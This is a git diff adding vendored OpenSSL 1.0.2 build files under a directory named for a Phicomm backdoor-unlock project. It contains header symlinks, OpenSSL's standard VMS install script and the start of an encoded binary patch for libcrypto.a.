--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/x509_vfy.h
@@ -0,0 +1 @@
+../../crypto/x509/x509_vfy.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/x509v3.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/x509v3.h
new file mode 120000
index 0000000..63d12f9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/x509v3.h
@@ -0,0 +1 @@
+../../crypto/x509v3/x509v3.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/install.com b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/install.com
new file mode 100644
index 0000000..6a0ea2d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/install.com
@@ -0,0 +1,136 @@
+$! INSTALL.COM -- Installs the files in a given directory tree
+$!
+$! Author: Richard Levitte <richard@levitte.org>
+$! Time of creation: 22-MAY-1998 10:13
+$!
+$! P1  root of the directory tree
+$! P2  "64" for 64-bit pointers.
+$!
+$!
+$! Announce/identify.
+$!
+$ proc = f$environment( "procedure")
+$ write sys$output "@@@ "+ -
+   f$parse( proc, , , "name")+ f$parse( proc, , , "type")
+$!
+$ def_orig = f$environment( "default")
+$ on error then goto tidy
+$ on control_c then goto tidy
+$!
+$ if (p1 .eqs. "")
+$ then
+$   write sys$output "First argument missing."
+$   write sys$output -
+     "It should be the directory where you want things installed."
+$   exit
+$ endif
+$!
+$ if (f$getsyi("cpu") .lt. 128)
+$ then
+$   arch = "VAX"
+$ else
+$   arch = f$edit( f$getsyi( "arch_name"), "upcase")
+$   if (arch .eqs. "") then arch = "UNK"
+$ endif
+$!
+$ archd = arch
+$!
+$ if (p2 .nes. "")
+$ then
+$   if (p2 .eqs. "64")
+$   then
+$     archd = arch+ "_64"
+$   else
+$     if (p2 .nes. "32")
+$     then
+$       write sys$output "Second argument invalid."
+$       write sys$output "It should be "32", "64", or nothing."
+$       exit
+$     endif
+$   endif
+$ endif
+$!
+$ root = f$parse( p1, "[]A.;0", , , "syntax_only, no_conceal") - "A.;0"
+$ root_dev = f$parse( root, , , "device", "syntax_only")
+$ root_dir = f$parse( root, , , "directory", "syntax_only") -
+		   - ".][000000" - "[000000." - "][" - "[" - "]"
+$ root = root_dev + "[" + root_dir
+$!
+$ define /nolog wrk_sslroot 'root'.] /trans=conc
+$ define /nolog wrk_sslcerts wrk_sslroot:[certs]
+$ define /nolog wrk_sslinclude wrk_sslroot:[include]
+$ define /nolog wrk_ssllib wrk_sslroot:[lib]
+$ define /nolog wrk_sslprivate wrk_sslroot:[private]
+$ define /nolog wrk_sslxexe wrk_sslroot:['archd'_exe]
+$ define /nolog wrk_sslxlib wrk_sslroot:['arch'_lib]
+$!
+$! Exhibit the destination directory.
+$!
+$ write sys$output "   Installing to (WRK_SSLROOT) ="
+$ write sys$output "    ''f$trnlnm( "wrk_sslroot")'"
+$ write sys$output ""
+$!
+$ if f$parse("wrk_sslroot:[000000]") .eqs. "" then -
+   create /directory /log wrk_sslroot:[000000]
+$ if f$parse("wrk_sslxexe:") .eqs. "" then -
+   create /directory /log wrk_sslxexe:
+$ if f$parse("wrk_sslxlib:") .eqs. "" then -
+   create /directory /log wrk_sslxlib:
+$ if f$parse("wrk_ssllib:") .eqs. "" then -
+   create /directory /log wrk_ssllib:
+$ if f$parse("wrk_sslinclude:") .eqs. "" then -
+   create /directory /log wrk_sslinclude:
+$ if f$parse("wrk_sslcerts:") .eqs. "" then -
+   create /directory /log wrk_sslcerts:
+$ if f$parse("wrk_sslprivate:") .eqs. "" then -
+   create /directory /log wrk_sslprivate:
+$ if f$parse("wrk_sslroot:[VMS]") .EQS. "" THEN -
+   create /directory /log wrk_sslroot:[VMS]
+$!
+$ sdirs := CRYPTO, SSL, APPS, VMS !!!, RSAREF, TEST, TOOLS
+$ exheader := e_os2.h
+$!
+$ copy /protection = w:re 'exheader' wrk_sslinclude: /log
+$!
+$ i = 0
+$ loop_sdirs: 
+$   d = f$edit( f$element(i, ",", sdirs), "trim")
+$   i = i + 1
+$   if d .eqs. "," then goto loop_sdirs_end
+$   write sys$output "Installing ", d, " files."
+$   set default [.'d']
+$   @ install-'d'.com 'root'] 'p2'
+$   set default 'def_orig'
+$ goto loop_sdirs
+$ loop_sdirs_end:
+$!
+$ write sys$output ""
+$ write sys$output "	Installation done!"
+$ write sys$output ""
+$ if (f$search( root+ "...]*.*;-1") .nes. "")
+$ then
+$   write sys$output "	You might want to purge ", root, "...]"
+$   write sys$output ""
+$ endif
+$!
+$ tidy:
+$!
+$ set default 'def_orig'
+$!
+$ call deass wrk_sslroot
+$ call deass wrk_sslcerts
+$ call deass wrk_sslinclude
+$ call deass wrk_ssllib
+$ call deass wrk_sslprivate
+$ call deass wrk_sslxexe
+$ call deass wrk_sslxlib
+$!
+$ exit
+$!
+$ deass: subroutine
+$ if (f$trnlnm( p1, "LNM$PROCESS") .nes. "")
+$ then
+$   deassign /process 'p1'
+$ endif
+$ endsubroutine
+$!
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/libcrypto.a b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/libcrypto.a
new file mode 100644
index 0000000000000000000000000000000000000000..7b7176403deccec933c0d45750bd43e98e334e50
GIT binary patch
literal 3086838
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
